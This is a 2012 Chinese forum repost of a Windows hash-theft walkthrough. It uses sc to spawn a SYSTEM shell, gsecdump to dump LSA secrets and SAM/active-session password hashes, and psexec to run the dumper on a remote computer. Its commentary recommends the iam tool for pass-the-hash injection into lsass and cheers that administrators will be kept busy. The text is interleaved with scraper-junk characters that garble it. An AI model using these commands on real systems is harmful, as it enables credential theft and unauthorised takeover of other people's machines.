标题: HASH注入式攻击 [打印本页] 作者: admin 时间: 2012-11-6 21:09 标题: HASH注入式攻击 o get a DOS Prompt as NT system: & S; ~2 w' ?5 A6 L: @( z9 ]/ e. i: `; J6 l
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact . m) B: }, ]% Z- `[SC] CreateService SUCCESS - a8 e# q! X7 P2 I " E8 R( y0 |8 x( N/ z/ D* q: DC:\>sc start shellcmdline, d, p1 [+ h4 T# T6 P4 _4 X7 K
[SC] StartService FAILED 1053: ! l& u" }) v% D0 l/ c $ b' A; i8 A" O+ F$ {The service did not respond to the start or control request in a timely fashion.* G+ ^# U8 i3 Y9 z( w: v- F
% u" f0 i9 k: R* A. i7 ^; S9 j. `* WC:\>sc delete shellcmdline7 I4 d- w; _! ]* B* w" f
[SC] DeleteService SUCCESS1 Z/ E8 z% h5 G4 ?9 Q
2 i5 K l2 b" E* @1 y/ k
------------ + @, _, G( C7 x. w$ v- l( ?1 V4 g1 ~6 B h
Then in the new DOS window:# G7 P9 I, N: n2 [6 o! b
$ l$ P* n- l r& P
Microsoft Windows XP [Version 5.1.2600]: b5 ^3 ]& B7 n$ Y @
(C) Copyright 1985-2001 Microsoft Corp. 7 U' X) `) I) x& Y( _" B a9 J7 ]) j4 V( h7 T6 ?
C:\WINDOWS\system32>whoami8 ?6 R ?" p- T+ a1 X
NT AUTHORITY\SYSTEM k, J8 t' I/ g4 I) \. y( |2 ?2 Z2 d" v
- C' P3 G8 D1 n8 j7 w& VC:\WINDOWS\system32>gsecdump -h7 v6 r* _6 { y$ v4 E
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)* ^1 _0 I5 g- o9 O' W8 ]9 x
usage: gsecdump [options]& u5 l) g' A3 A# \# F
1 t7 @/ B" d) @8 eoptions: ! ?/ x$ e$ G* g, |' \& o4 M-h [ --help ] show help 3 f! ?$ u3 g: w$ s3 \-a [ --dump_all ] dump all secrets / z6 l- x0 `- g6 Z-l [ --dump_lsa ] dump lsa secrets $ t, K4 ~' E& I-w [ --dump_wireless ] dump microsoft wireless connections % p/ k& B. A5 r+ z3 u9 X-u [ --dump_usedhashes ] dump hashes from active logon sessions: i) r, m: F& a& k) D7 W
-s [ --dump_hashes ] dump hashes from SAM/AD; P' o) I& p5 X( O
4 M' Y+ `! v' \- }" D. W0 I) SAlthough I like to use:% N3 D; \! s6 `
5 t9 N# u" n0 X1 n) t& q" FPsExec v1.83 - Execute processes remotely ! P1 i+ K* D+ p' vCopyright (C) 2001-2007 Mark Russinovich9 i. Z5 M( N' K r; d# U
Sysinternals - 链接标记[url]www.sysinternals.com[/url]; D/ x* I3 t4 F5 d. X" Y; O6 q
7 g# r& m) `4 v+ c, i" Z" v
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT+ c. E; r3 p, q8 n1 }8 @
7 e6 e, W, t) O; l
to get the hashes from active logon sessions of a remote system.$ `' u; S0 T1 c, @4 D' c
; s0 [1 Y# L }5 I+ B, n; ?These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables." Y0 Y1 G/ ?! J7 S! ~% c
& P9 ?9 ?8 |1 D `提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了. 8 `; z+ X2 S* j原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]2 K2 X8 Z/ @1 B& Q3 G
e- q5 o3 V1 ^- H. n
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。& ^1 P L: ]) G; V' D7 z0 b/ `) N